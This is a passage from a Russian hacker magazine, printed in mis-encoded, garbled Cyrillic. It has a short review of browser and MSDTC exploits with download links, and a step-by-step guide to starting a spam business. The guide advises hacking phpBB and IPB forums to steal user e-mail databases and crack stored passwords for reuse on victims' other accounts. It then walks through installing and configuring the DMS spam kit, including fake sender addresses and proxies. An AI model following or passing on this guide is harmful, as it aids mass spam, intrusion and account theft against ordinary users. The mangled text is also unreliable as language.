ïðèâåëî óñòðîèòåëåé êîíêóðñà ê ïîòåðå äîñîåäèíåíèé âàøåãî êîìïüþòåðà) âåðèÿ ìíîãèõ ñîòåí, à òî è òûñÿ÷ ñâîèõ ïîñåòèòåëåé. ß óæå íå ãî- NetBios-ñêàíåð NBScan âîðþ î ðåïóòàöèè ñàéòà. - Ñêàíåð TCP-ïîðòîâ ñ êó÷åé âîçìîæíîñòåé Øàãàÿ â íîãó ñî âðåìåíåì, èñïîëüçóÿ íîâûå òåõíîëîãèè, íå çàPortScan ëþïîäê íèìè âíåø çà áûâàé ñìîòðåòü ïîä ýòè ñàìûå íîãè. Ñîâðåìåííûé ìèð òàê ïðîðîëÿ êîíò äëÿ s Share èòà - Óòèë íèçàí è ñâÿçàí ñ ãëîáàëüíîé Ñåòüþ, ÷òî, ïîìèìî äîõîäà, ìîæåò ÷åíèÿìè ê òâîèì øàðàì sts ïðèíåñòè è íå ìàëûé óùåðá, åñëè âîâðåìÿ íå îñòàíîâèòüñÿ, ðåLMHosts — óäîáíûé ðåäàêòîð ôàéëà lmho âíåâûìè øàÿ âîïðîñû, â êîòîðûõ ñàì íè÷åãî íå ñìûñëèøü. Óäà÷è! - Óòèëèòà RawSocket äëÿ ðàáîòû ñ íèçêîóðî

ETTOOLS 3.2 N L IA T N E S S E

TCP/UDP-ñîåäèíåíèÿìè - Ìåíåäæåð ïðîöåññîâ ProcMon te, Ping - Êó÷à ñòàíäàðòíûõ óòèëèò âðîäå TraceRou è nskloop

076

BINARY YOUR’S z

Ñàéò ñ êîíêóðñîì, êîòîðûé ÿ ìó÷èë: zoom.cnews.ru Ñàéò ðàçðàáîò÷èêîâ Essential NetTools: www.tamos.ru Ñàéò ñîôòèíû SWF Decompiler: www.sothink.com

XÀÊÅÐ 01 /85/ 06


Äîêó÷àåâ Äìèòðèé aka Forb (forb@real.xakep.ru)

EXPLOITS REVIEW IE «WINDOW()» 0DAY EXPLOIT

FIREFOX 1.5 BUFFER OVERFLOW EXPLOIT

MSDTC REMOTE EXPLOIT

îïèñàíèå: Êîðïîðàöèÿ Microsoft ñíîâà îòëè÷èëàñü íåñòàáèëüíîñòüþ ñâîèõ ïðîäóêòîâ. Íà ýòîò ðàç â public-èñòî÷íèêàõ ïîÿâèëñÿ 0day ýêñïëîéò äëÿ Internet Explorer 6.0. Áàã àêòóàëåí äëÿ âåðñèé Win2k è WinXP ñî âñåìè ñåðâèñïàêàìè. Ñóòü îøèáêè ñîñòîèò â ïðîñòîì ïåðåïîëíåíèè áóôåðà (à êàêèå ìîãóò áûòü åùå îøèáêè â ïðîäóêòàõ MS? :)), êîòîðîå âûçûâàåòñÿ ÷åðåç ôóíêöèþ window() ÿçûêà JavaScript. Ýêñïëîéò ñîñòîèò èç 5 ðàçíûõ ôàéëîâ. Ñòàðòîâûé HTML ïîçâîëÿåò âûáðàòü îïåðàöèîííóþ ñèñòåìó. Ïîñëå êëèêà ïî ñîîòâåòñòâóþùåé ññûëêå íåçàìåäëèòåëüíî çàïóñòèòñÿ êàëüêóëÿòîð. Ó÷èòûâàÿ, ÷òî øåëë-êîä âî âðåäîíîñíîì ôàéëå fillmem.htm ìîæíî ëåãêî èçìåíèòü, ýêñïëîéò ïðèðàâíèâàåòñÿ ê êðèòè÷åñêèì :).

îïèñàíèå: Ýòîò ìåñÿö âûäàëñÿ óðîæàéíûì â ïëàíå ýêñïëîéòîâ ïðîòèâ èçâåñòíûõ áðàóçåðîâ. Åñëè äûðêå â IE íèêòî íå óäèâèëñÿ, òî ïåðåïîëíåíèå áóôåðà â ýëèòíîì áðàóçåðå FireFox çàñòàâèëî ìíîãèõ çàäóìàòüñÿ. Ñàì ýêñïëîéò íå çàíèìàåò ìíîãî êîäà, òàê êàê òîëüêî àâàðèéíî çàâåðøàåò ïðîãðàììó. Íî ÿ áîëüøå ÷åì óâåðåí, ÷òî â çàêðûòûõ èñòî÷íèêàõ ñîäåðæèòñÿ êîä, çàïóñêàþùèé êàêîå-ëèáî ïðèëîæåíèå. Ïåðåïîëíåíèå áóôåðà îñóùåñòâëÿåòñÿ çà ñ÷åò ôîðìèðîâàíèÿ äëèííîãî çàãëàâèÿ äîêóìåíòà (5000 ñèìâîëîâ). Ýòî ïðîèñõîäèò ïîñëå íàæàòèÿ íà ññûëêó ñ âûçîâîì ïðîñòåíüêîãî JavaScript’à.

îïèñàíèå: Microsoft â ýòîì ìåñÿöå îêàçàëàñü ïîä ïðèöåëîì. Ïîìèìî áàãà â îñëå, õàêåðû çàïàëèëè åùå îäíó áðåøü â ñåðâèñå «êîîðäèíàòîð ðàñïðåäåëåííûõ òðàíçàêöèé», aka MSDTC. Êàê îêàçàëîñü, â ýòîé ñëóæáå çàðûòî ïåðåïîëíåíèå áóôåðà, êîòîðîå ïðè îïðåäåëåííîì ðàñêëàäå ìîæåò îñòàíîâèòü ñèñòåìó ëèáî âûïîëíèòü ïðîèçâîëüíûé êîä. Âîîáùå, çëîóìûøëåííèêè íàïèñàëè öåëûõ äâà âèäà ýòîãî êîâàðíîãî ýêñïëîéòà: ïåðâûé âûïîëíÿåò ïðîèçâîëüíûé êîä (îòêðûâàåò ïîðò ñ cmd.exe), âòîðîé âûïîëíÿåò DoS, îñòàíàâëèâàÿ ðàáîòó âñåé ñèñòåìû. ×òî êàñàåòñÿ âåðñèé óÿçâèìûõ ñèñòåì, òî ýêñïëîéòó ïîäâåðæåíû Win2000, WinXP, WinXP+SP1 è Win2003. Âñå îñòàëüíûå ðåëèçû íåóÿçâèìû. Ñïëîèò íàïèñàí íà C++, ïîýòîìó äëÿ åãî êîìïèëÿöèè ïîíàäîáèòñÿ ñáîðùèê lcc. Íàïîìèíàþ, ÷òî âçÿòü åãî ìîæíî íà www.nsd.ru.

çàùèòà: Êàê îáû÷íî, Microsoft äîâîëüíî îïåðàòèâíî îòðåàãèðîâàëà íà áàã è âûïóñòèëà ïàò÷è äëÿ óÿçâèìûõ ñèñòåì. Ñïèñîê çàïëàòîê ìîæíî íàéòè íà ñàéòå www.computerterrorism.com. Âñå ïàò÷è ëåæàò åùå íà íàøåì äèñêå. cñûëêè: Èñõîäíûå êîäû âñåõ HTML-ôàéëîâ íàõîäÿòñÿ çäåñü: (www.securitylab.ru/poc/extra/ 242256.php). Ïðî òåõíè÷åñêóþ ðåàëèçàöèþ óÿçâèìîñòè ìîæíî ïðî÷èòàòü íà ðåñóðñå http://security.nnov.ru/Kdocument294.html. OnLine-âåðñèÿ ýêñïëîéòà æèâåò íà ñòðàíèöå www.computerterrorism.com/research/ie/poc.htm. çëîêëþ÷åíèå: Äàííûé ýêñïëîéò áóäóò èñïîëüçîâàòü ìíîãèå õàêåðû. Âî-ïåðâûõ, ñ ïîìîùüþ òàêîãî ñðåäñòâà ìîæíî ëåãêî çàãðóçèòü êàêîãî-íèáóäü áîòà èëè òðîÿíà, à âî-âòîðûõ, ëåãêî ñêà÷àòü íåîáõîäèìóþ èíôîðìàöèþ ñ êîìïüþòåðà íåäðóãà, èñïîëüçóÿ ñòàíäàðòíûå ïðèåìû ñîöèàëüíîé èíæåíåðèè.  îáùåì, äàííûé ñïëîèò — ðåàëüíàÿ âåùü, êîòîðàÿ ðåäêî ïîÿâëÿåòñÿ â ïóáëè÷íûõ èñòî÷íèêàõ.

çàùèòà: Íà äàííûé ìîìåíò çàùèòû îò ýêñïëîéòà íå ñóùåñòâóåò. Îøèáêà îáíàðóæåíà â ïîñëåäíåé âåðñèè áðàóçåðà è ïðîâåðåíà íà ñèñòåìàõ Win2k è WinXp+SP2 (âòîðîé âàðèàíò ïðîâåðåí ëè÷íî ìíîé :)). cñûëêè: Òåêñò ýêñïëîéòà ìîæíî íàéòè íà ñòðàíèöå www.securitylab.ru/poc/extra/242789.php. Çäåñü æå íàõîäèòñÿ òåõíè÷åñêîå îïèñàíèå óÿçâèìîñòè. çëîêëþ÷åíèå: Êàê óæå áûëî îòìå÷åíî, DoS, ïðîâîäèìûé ýêñïëîéòîì, äàëåêî íå åäèíñòâåííîå ïîñëåäñòâèå. Áûòü ìîæåò, ñêîðî ìû óâèäèì ñïëîèò, óäàëåííî âûïîëíÿþùèé ïðîèçâîëüíûé êîä â îäíîì èç ñàìîì çàùèùåííîì áðàóçåðå. greets: Ñâîè ñïîñîáíîñòè â ñîçäàíèè ýêñïëîéòîâ íàì ïîêàçàë ÷óâàê ZIPLOCK ñ êîçûðíûì åìàéëîì sickbeatz@gmail.com. Ïèøèòå åìó ñâîè âîïðîñû, è îí îáÿçàòåëüíî îòâåòèò :).

greets: Àâòîðîì ýêñïëîéòà ÿâëÿåòñÿ õàêåð ñ íèêîì Stuart Pearson èç êîìàíäû Computer Terrorism (www.computerterrorism.com). Ïîæåëàåì åìó óäà÷è è â äàëüíåéøèõ ðåëèçàõ :).

òåñòîâûé çàïóñê êàëüêóëÿòîðà

XÀÊÅÐ 01 /85/ 06

çàùèòà: Çàùèòèòüñÿ îò ýêñïëîéòà ìîæíî ïóòåì óñòàíîâêè ñîîòâåòñòâóþùèõ çàïëàòîê îò MS. Ññûëêè íà ïàò÷è äëÿ Win2k, WinXP è Win2003 ìîæíî íàéòè íà ñòðàíèöå: www.securitylab.ru/vulnerability/241002.php. cñûëêè: Ýêñïëîéò ìîæíî ñêà÷àòü ïî àäðåñó www.securitylab.ru/poc/extra/242546.php (âûïîëíåíèå ïðîèçâîëüíîãî êîäà) ëèáî ïî ññûëêå www.securitylab.ru/poc/extra/242546.php (îòêàç â îáñëóæèâàíèè). Íà ñòðàíèöå www.securitylab.ru/vulnerability/source/241008.php òû íàéäåøü òåõíè÷åñêóþ äîêóìåíòàöèþ íà áóðæóéñêîì ÿçûêå. çëîêëþ÷åíèå: Åùå îäèí ýêñïëîéò ïðîòèâ Microsoft ïîíèçèë ðåïóòàöèþ êîðïîðàöèè íà íåñêîëüêî ïóíêòîâ. Íî ÿ óâåðåí, ÷òî õàêåðû íà ýòîì íå îñòàíîâÿòñÿ è áóäóò èññëåäîâàòü ñåðâèñû äÿäè Áèëëà äî èñïðàâëåíèÿ ïîñëåäíåé îøèáêè â êîäå Windows :). greets: Ýêñïëîéò áûë íàïèñàí õàêåðîì Swan (swan@0x557.org), êîòîðûé ïåðåäàåò ïðèâåò âñåì äðóçüÿì è òåì, êòî åãî çíàåò è ëþáèò :).

ñìåðòü FireFox!

câîäêà îò iDEFENCE

077


ÂÇËÎÌ

TEXT ÑÀØÀ ËÞÁÈÌÎÂ + ÄÌÈÒÐÈÅÂ ÄÀÍÈË / 334437228 /

ÑÏÀÌ Ñ ÍÓËß ÊÀÊ ÏÎÄÍÈÌÀÞÒ ÑÂÎÉ ÑÏÀÌ-ÁÈÇÍÅÑ Ñ ÍÓËß ÂÑÅÌ ÍÀÌ ÏÐÈÕÎÄÈÒÑß ÊÀÆÄÛÉ ÄÅÍÜ ÂÛÃÐÅÁÀÒÜ ÈÇ ÏÎ×ÒÎÂÎÃÎ ßÙÈÊÀ ÌÅÃÀÁÀÉÒÛ ÏÈÑÅÌ ÑÎÌÍÈÒÅËÜÍÎÃÎ ÑÎÄÅÐÆÀÍÈß Ñ ÏÐÅÄËÎÆÅÍÈßÌÈ ÏÐÈÎÁÐÅÑÒÈ ÏÀÐÓ ÒÎÍÍ ÏÎÄÃÍÈÂØÅÉ ÒÓØÎÍÊÈ, ÓÂÅËÈ×ÈÒÜ ÍÅÊÎÒÎÐÛÅ ×ÀÑÒÈ ÑÂÎÅÃÎ ÒÅËÀ, ÊÓÏÈÒÜ ÎÒÏÓÃÈÂÀÒÅËÜ ÑÎÁÀÊ ÈËÈ ÏÎÑÅÒÈÒÜ ÏÎÇÍÀÂÀÒÅËÜÍÛÉ ÑÅÌÈÍÀÐ ÏÎ ÓÐÎËÎÃÈ×ÅÑÊÎÌÓ ÌÀÑÑÀÆÓ. ÑÅÃÎÄÍß ÍÀÑÒÀË ÌÎÌÅÍÒ, ÊÎÃÄÀ ÌÛ Ñ ÒÎÁÎÉ ÇÀÃËßÍÅÌ ÏÎ ÒÓ ÑÒÎÐÎÍÓ ÁÀÐÐÈÊÀÄ È ÐÀÇÁÅÐÅÌÑß Ñ ÒÅÌ, ÊÀÊ ÑÅÒÅÂÛÅ ÍÅÃÎÄßÈ ÏÎÄÍÈÌÀÞÒ ÑÎÁÑÒÂÅÍÍÛÉ ÑÏÀÌ-ÁÈÇÍÅÑ

Ïðåæäå âñåãî íóæíî ðàçîáðàòüñÿ ñ òåì, ÷òî íóæíî äëÿ îðãàíèçàöèè ñïàì-ðàññûëêè. Ñïèñîê ýòîò ñîñòîèò èç íåñêîëüêèõ ïóíêòîâ. ÁÀÇÀ E-MAIL'ΠÄËß ÐÀÑÑÛËÊÈ Ïîä «áàçîé» çäåñü ïîíèìàåòñÿ íå òóïîé ñïàìëèñò, à òàáëèöà ñ âàëèäíûìè àäðåñàìè è íåêîòîðîé äîïîëíèòåëüíîé èíôîðìàöèåé, êîòîðàÿ ïîçâîëÿåò îòñåèâàòü òîëüêî íóæíûå àäðåñà, êîòîðûå ïîäïàäàþò ïîä îïðåäåëåííûå êðèòåðèè âûáîðêè. Íàïðèìåð, â áóäóùåì ê òåáå ìîæåò îáðàòèòüñÿ ðåêëàìîäàòåëü, êîòîðûé çàõî÷åò ïðîâåñòè ðàññûëêó òîëüêî ïî öåëåâîé àóäèòîðèè: ðóññêîãîâîðÿùèì æèòåëÿì åâðîïåéñêîé ÷àñòè ÐÔ, ìóæ÷èíàì, èíòåðåñóþùèìñÿ ìàøèíàìè. Âîò çäåñü òâîÿ áàçà äîëæíà ïîçâîëèòü îñóùåñòâèòü âûáîðêó ïî áîëüøîìó ÷èñëó êðèòåðèåâ: ãåîãðàôè÷åñêîå ïîëîæåíèå, ðàçãîâîðíûé ÿçûê, ïîë è ñïèñîê èíòåðåñîâ (ýòî ñàìîå ãëàâíîå). Ñåé÷àñ ìû ïîäîøëè ê ñåðüåçíîé ïðîáëåìå: ãäå æå ìîæíî äîñòàòü òàêóþ «óìíóþ» áàçó? > Ñàìûé ïåðâûé è ïðîñòîé âàðèàíò — ïðîñòî êóïèòü åå. Íàéòè ïðîäàâöîâ áàç ìîæíî íà õàêåðñêèõ è adult-ôîðóìàõ. Ïðàâäà, ñðåäè íèõ ìíîãî êèäàë è âûöåïèòü ÷åëîâåêà, ó êîòîðîãî ðåàëüíî åñòü õîðîøèå ìûëüíèêè, î÷åíü òðóäíî. Íî ìîæíî, ñòîèò ëèøü íåñêîëüêî íåäåëü ïîîáùàòüñÿ íà ôîðóìàõ è irc, êàê íóæíûé ÷åëîâåê ñàì òåáÿ íàéäåò :). Áàçû ìîæíî

>

Íà íàøåì äèñêå òû íàéäåøü ïîëíûå âåðñèè ïðîãðàìì, îïèñàííûõ â ýòîé ñòàòüå.

òàêæå êóïèòü ó êîìïàíèé, çàíèìàþùèõñÿ ñïàìîì.  áîëüøèíñòâå ñëó÷àåâ âìåñòå ñ ðàññûëêîé ðåêëàìû êëèåíòîâ òàêèå êîìïàíèè ðàññûëàþò ñîáñòâåííóþ ðåêëàìó ñ ïðàéñîì íà ðàññûëêó è ïîêóïêó áàç ýëåêòðîííîé ïî÷òû. Öåíû êîëåáëþòñÿ îò 1,5 äî 6 òûñÿ÷ ðóáëåé. Ê ñîæàëåíèþ, òå áàçû, êîòîðûå âûñòàâëåíû íà ïðîäàæó, ïðåäñòàâëÿþò ñîáîé ïðîñòî ïîñëåäîâàòåëüíîñòü ìûëüíèêîâ, è êàê-òî òàðãåòèðîâàòü ðàññûëêè â ýòîì ñëó÷àå áóäåò î÷åíü ñëîæíî. Ïîýòîìó ìû ñ òîáîé ïåðåõîäèì ê ñëåäóþùåìó ñïîñîáó. > Êàê òû çíàåøü, â ïîñëåäíåå âðåìÿ ñòàíîâèòñÿ âñå ïðîùå è ïðîùå âçëîìàòü ïîïóëÿðíûé ôîðóì: áîëüøèíñòâî èç íèõ ðàáîòàþò íà áåñïëàòíûõ äâèæêàõ, äûðÿâûõ êàê ðåøåòî, è ïîýòîìó íå íàäî áûòü õàêåðîì-ãåíèåì, ÷òîáû ïîëîìàòü î÷åðåäíóþ phpBB- èëè IPB-áîðäó. Íàñ ñ òîáîé â ýòîì ïðîöåññå áóäåò èíòåðåñîâàòü èñêëþ÷èòåëüíî áàçà ïîëüçîâàòåëåé ñ èõ e-mail àäðåñàìè. Ñàì ïîíèìàåøü, òàêîé ïîäõîä ïî÷òè ïîëíîñòüþ èñêëþ÷àåò áèòîñòü àäðåñîâ è äàåò áëèçêóþ ê 100% âàëèäíîñòü ÿùèêîâ. Ê òîìó æå áàçû äîñòàíóòñÿ òåáå àáñîëþòíî áåñïëàòíî, à ïî òåìàòèêå ñàéòà è âåòêå ôîðóìà, ãäå òîò èëè èíîé ÷åëîâåê ïðîÿâëÿåò íàèáîëüøóþ àêòèâíîñòü, ìîæíî áóäåò ñóäèòü îá

èíòåðåñàõ òâîèõ áóäóùèõ àäðåñàòîâ. Åùå â òàáëèöå ñ ïîëüçîâàòåëÿìè åñòü êó÷à èíòåðåñíûõ ïîëåé, òàêèõ êàê ïîëå password, ðàñøèôðîâàâ ñîäåðæèìîå êîòîðîãî, ìîæíî ïîïðîáîâàòü ïîäîáðàòü ïàðîëü ê íîìåðó àñüêè, ê ìûëüíèêó èëè ñàéòó ïîëüçîâàòåëÿ, åñëè òàêîé ó íåãî èìååòñÿ. > Òðåòèé ñïîñîá — íàñòîÿùèé áàÿí, êîòîðûé ñ êàæäûì äíåì òåðÿåò ýôôåêòèâíîñòü, è çàòðàòû íà åãî ðåàëèçàöèþ ðàñòóò. Êàê òû çíàåøü, ñóùåñòâóþò ïðîãðàììû-ñïàéäåðû, êîòîðûå «õîäÿò ïî ñàéòàì è âûäèðàþò ñî ñòðàíèö åìåéë-àäðåñà». Âîçìîæíî, òû óäèâëåí, ÷òî ÿ íàçâàë ýòîò ñïîñîá «áàÿíîì», íî îí äåéñòâèòåëüíî óæå îòæèâàåò ñâîå. Äåëî â òîì, ÷òî òàêèì ñïîñîáîì äîâîëüíî ñëîæíî íàéòè áîëüøîå ÷èñëî âàëèäíûõ åìåéëîâ; ìíîãèå àäðåñà áûñòðî óìèðàþò, à ÷òîáû ñîáðàòü íîðìàëüíûé ñïàì-ëèñò, ïîíàäîáèòñÿ êó÷à âðåìåíè è èíòåðíåò-òðàôèêà. Êðîìå òîãî, ñóùåñòâóåò äîâîëüíî ìíîãî ëþäåé, êîòîðûå íå îñòàâëÿþò óïîìèíàíèé î ñâîåì ìûëå â îáùåäîñòóïíûõ ìåñòàõ, ëèáî ïðèìåíÿþò ðàçëè÷íûå óõèùðåíèÿ, ÷òîáû ñïðÿòàòü ìûëî îò ñïàì-ïàóêîâ. Ê ïðèìåðó, ìíîãèå îñòàâëÿþò ìûëî â ôîðìàòå vasya(at)mail(dot)ru, à íåêîòîðûå óøëåïêè âîîáùå êîäèðóþò àäðåñà base64 :).

Öåíû êîëåáëþòñÿ îò 1,5 äî 6 òûñÿ÷ ðóáëåé. 078

XÀÊÅÐ 01 /85/ 06


ÄÌÑ â òîò ìîìåíò, ê êî ìíå â ðóêè, ñòîèë ïîãäà ïîïàë îðÿäêà $1500—2000 . ÒÅÌÍÀß ÑÒÎÐÎÍÀ Ïîñëå òîãî êàê ìû ðàçîáðàëèñü ñ ñîñòàâëåíèåì ñïàì-áàçû, íàñòàëî âðåìÿ óñòàíàâëèâàòü è èñïîëüçîâàòü ñïàìåðñêèé ñîôò. ß ðàññêàæó òåáå, êàê ðàáîòàòü ñ î÷åíü ïîïóëÿðíîé ñïàìåðñêîé ïðîãðàììîé, êîòîðàÿ íîñèò íàçâàíèå DMS (Direct Marketig System). Ìåæäó äåëîì ñêàæó, ÷òî ÄÌÑ â òîò ìîìåíò, êîãäà ïîïàë êî ìíå â ðóêè (ýòî áûëî, êîíå÷íî, íå ïîçàâ÷åðà), ñòîèë ïîðÿäêà $1500—2000. Óæ çà òàêèå äåíüãè ñòîèëî áû îòòî÷èòü è âûëèçàòü ýòîò êîìïëåêò äî áëåñêà, — ïîäóìàë ÿ è, êàê âñåãäà, îøèáñÿ. Èòàê, ÷òî æå òàêîå DMS? Ýòî íàáîð perl-ñêðèïòîâ, êîòîðûå íå òîëüêî îñóùåñòâëÿþò ðàññûëêó, íî è â ïðèäà÷ó èìåþò óäîáíûé âåá-èíòåðôåéñ, ñ ïîìîùüþ êîòîðîãî âîçìîæíî êîìôîðòíî ðóêîâîäèòü ïðîöåññîì ñïàìà è, åñëè åñòü íåîáõîäèìîñòü, — ïðèîñòàíîâèòü åãî íà âðåìÿ. Ïðèñòóïàåì ê óñòàíîâêå. Ïåðâûì äåëîì íóæíî (ëþáûìè ñïîñîáàìè) ðàçäîáûòü àðõèâ ñ äèñòðèáóòèâîì ÄÌÑ. Äîáûë? :) Òîãäà ïîåõàëè:

unzip dms.zip cd dms; perl install.pl Ñêðèïò íà÷íåò ñïðàøèâàòü, êóäà ñòàâèòü êîìïëåêò, êàêîé èñïîëüçîâàòü DOCUMENT_ROOT è òàê äàëåå. ß áû íå ñòàë ìåíÿòü ýòè çíà÷åíèÿ, èõ ìîæíî ñîñòàâèòü ïî óìîë÷àíèþ.

# cd /home/dms Òóò ñëåäóåò ïðîöåññ ñîçäàíèÿ ïîëüçîâàòåëÿ. Îòîéäÿ îò òåìû, ñêàæó, ÷òî ÄÌÑ ðàáîòàåò ñ ïîëüçîâàòåëÿìè ÷åðåç www, ïðè÷åì êàæäûé ïîëüçîâàòåëü èìååò îãðàíè÷åííîå êîëè÷åñòâî îäíîâðåìåííî çàïóùåííûõ ñïàì-çàäàíèé. Íî âåðíåìñÿ ê íàøèì ïîëüçîâàòåëÿì. Ïåðåä çàïóñêîì ñöåíàðèÿ newuser.pl åãî íóæíî ñëåãêà ïîäïðàâèòü:

èçó÷àåì êîä DMS

# vi newuser.pl  ñàìîì íà÷àëå ñëåäóåò ïåðåîïðåäåëèòü çíà÷åíèå ïåðåìåííîé $htpasswd, â êîòîðîé óêàçàí ïóòü ê îäíîèìåííîé óòèëèòå (ÿ íàäåþñü, ó òåáÿ ñòîèò àïà÷, à òî áåç íåãî áóäåò âåñüìà ïðîáëåìàòè÷íî). Òåïåðü ñìîòðèì êîä ñêðèïòà äàëåå: ãäå-òî â ðàéîíå 40—41 ñòðîêè ïðîâåðü çàïèñü #mkdir "$UserBase/$username". Åñëè îíà çàêîììåíòèðîâàíà, òî óáåðè êîììåíò è çàêëþ÷è ýòî âûðàæåíèå â îáðàòíûå êàâû÷êè. Äàëåå èäåò ñîçäàíèå ïîëüçîâàòåëüñêîãî êàòàëîãà â /home/dms è äîáàâëåíèå ñîçäàííîãî ïîëüçîâàòåëÿ â ãðóïïó ftp. Êñòàòè, ñ äîáàâëåíèåì òîæå ñâÿçàíà îäíà îñîáåííîñòü, êîòîðóþ ëåãêî ðàçãëÿäåòü:

adduser -d "$UserBase/$username" -g dmsusers $username -G ftp Êàê âèäèøü, çäåñü èñïîëüçóåòñÿ õàðàêòåðíûé äëÿ Linux ñèíòàêñèñ óòèëèòû adduser, ïîýòîìó åñëè òû õî÷åøü ïîñòàâèòü ÄÌÑ íà ôðÿõó, òî èçìåíè çíà÷åíèÿ ôëàãîâ íà àíàëîãè âî FreeBSD, à èìåííî: "-d" íà "-home", "-g" íà "group" .  ïðèíöèïå, òåïåðü ñêðèïò ãîòîâ ê çàïóñêó:

perl newuser.pl Óâû, îïÿòü ïîéäóò âîïðîñû. Óêàçûâàé èìÿ ïîëüçîâàòåëÿ è ïàðîëü, òîëüêî íå ïåðåæèâàé, ÷òî ââåäåííûé ïàðîëü îòîáðàæàåòñÿ â êîíñîëè, âåäü ââîä îñóùåñòâëÿåòñÿ ñòàíäàðòíûì ìåòîäîì ïåðë ñ èñïîëüçîâàíèåì <STDIN>. Âïåðåäè ïîñëåäóåò äèëåììà î ìàêñèìàëüíîì êîëè÷åñòâå âûïîëíÿåìûõ ðàññûëîê íà ïîëüçîâàòåëÿ: åñëè õî÷åøü óñòàíîâèòü àíëèìèòíîå êîëè÷åñòâî, òî îñòàâëÿé íîëü. Òåïåðü íàêîíåö-òî ìîæíî ïðèñòóïàòü ê ðàáîòå ñ DMS. Íàáåðè â áðàóçåðå àäðåñ ñâîåãî ñåðâàêà, ãäå òû óñòàíàâëèâàë ÄÌÑ, è ïóòü ê âåá-êàòàëîãó: www.spamerz.ru/ wwwdms.

îñíîâíîå ìåíþ DMS ñî ñïèñêîì çàäà÷

Ó òåáÿ çàïðîñÿò ëîãèí è ïàðîëü, êîòîðûå ìû çàäàâàëè ïðè äîáàâëåíèè ïîëüçîâàòåëÿ. Óðà, íàñ âïóñòèëè! Ñàìîå âðåìÿ ïðèñòóïèòü íåïîñðåäñòâåííî ê çàñïàìëèâàíèþ. Çàäàíèÿ äëÿ ðàññûëêè çäåñü íàçûâàþòñÿ Tasks (êòî áû ìîã ïîäóìàòü!) è ñîçäàâàòü èõ ìîæíî ñêîëüêî óãîäíî. Ñìûñë èõ â òîì, ÷òîáû ðåêëàìèðîâàòü ðàçíîíàïðàâëåííûå òîâàðû, òî åñòü îäíî çàäàíèå — îäèí êîíêðåòíûé òîâàð. Çàõîòåë ðàçðåêëàìèðîâàòü êîñòþìû îò Armani è óøàíêè îò Ïåòðîâè÷à? Íå âîïðîñ, ñîçäàâàé äâà òàñêà: Armani è Petrovich. Ñîáñòâåííî, êîãäà òû íàçâàë è ñîçäàë òàñê, â ëåâîì ìåíþ ÄÌÑ ïîÿâèòñÿ ñïèñîê òâîèõ òåêóùèõ çàäàíèé. Íàæàâ íà êðåñòè ñïðàâà îò èìåíè çàäàíèÿ, òåáå ðàñêðîþòñÿ ïîäìåíþ: íàñòðîéêà çàäàíèÿ, èíôîðìàöèÿ î çàäàíèè, îò÷åò ïî çàäàíèþ. ×òîáû ïðèñòóïèòü ê êîíôèãóðèðîâàíèþ çàäàíèÿ, íóæíî êëàöíóòü íà Configure. À âîò íàñòðîåê, ÿ òåáå ñêàæó, äîâîëüíî ìíîãî. Ïðè æåëàíèè òóò ìîæíî óêàçàòü: Ôàéë, êîòîðûé áóäåò ïðèàòòà÷åí ê ïèñüìàì Ñïèñîê àäðåñîâ îòïðàâèòåëåé (ôýéêîâûå àäðåñà) Ñïèñîê URL-àäðåñîâ, êîòîðûå áóäóò ôèãóðèðîâàòü â ïèñüìå Íàñòðîéêà êîäèðîâêè Èñïîëüçîâàíèå ïðîêñåé (äà/íåò) Êîëè÷åñòâî ïîòîêîâ Îãðàíè÷åíèå îòïðàâîê ïèñåì íà îäèí äîìåí  îáùåì, óñòàíîâîê òóò ïðîñòî ìîðå, è åñëè óêàçûâàòü è õàðàêòåðèçèðîâàòü èõ âñå, òî ïîëó÷èòñÿ íå ñòàòüÿ, à ñïàìåðñêèé ìàíóàë. Ñëåäóåò èìåòü â âèäó, ÷òî âñå îïöèè ñîïðîâîæäàþòñÿ îïèñàíèåì íà àíãëèéñêîì, â êîòîðûõ ðàçîáðàòüñÿ íå òàê óæ è òÿæåëî.

>

íàñòðîéêè íà ëþáîé âêóñ è öâåò

Çàêàç÷èêè ðåêëàìíîé ðàññûëêè, êîòîðûå âûêëàäûâàþò ëàâý çà ñïàì, îò íåãî æå è ñòðàäàþò. Íå ïîâîä ëè ýòî çàäóìàòüñÿ? Íå ïîâîä, ïîòîìó ÷òî îíè ìîãóò è ïîñòðàäàòü íåìíîãî, çàðàáàòûâàÿ õîðîøèå äåíüãè. XÀÊÅÐ 01 /85/ 06

079


ÂÇËÎÌ ///// ISSUE

ÍÅÑÊÎËÜÊÎ ÔÀÊÒΠΠÑÏÀÌÅ ÍÀ ÑÒÐÀÆÅ ÏÎÐßÄÊÀ Ïîíÿòíîå äåëî, ÷òî ñî ñïàìîì íèêòî íå õî÷åò ìèðèòüñÿ, è ïîýòîìó äëÿ òàêîãî àíòèñîöèàëüíîãî ÿâëåíèÿ ñòàëè ïðèäóìûâàòü ìåòîäû áîðüáû. Îòêðîâåííî ãîâîðÿ, ðåêëàìíàÿ ðàññûëêà â Ñåòè — íàñòîÿùàÿ ãîëîâíàÿ áîëü äëÿ àäìèíèñòðàòîðîâ: òîëïà íåäîâîëüíûõ êëèåíòîâ (ïåðåä îôèñîì è ñ ïàÿëüíèêàìè â ðóêàõ), ïëþñ íåñêîëüêî òîíí ëèøíåãî ñîæðàííîãî òðàôèêà. Äóìàþ, äàæå èíäóñó ïîíÿòíî, ÷òî òàêîé ðàñêëàä íå óñòðàèâàåò íèêîãî. Èìåííî äëÿ ïðîòèâîñòîÿíèÿ ñïàìùèêàì áûëî ðàçðàáîòàíî íåñêîëüêî ãëîáàëüíûõ êîíöåïöèé. Ñåé÷àñ äàâàé êðàòêî ðàññìîòðèì, ÷òî æå îíè èç ñåáÿ ïðåäñòàâëÿþò.

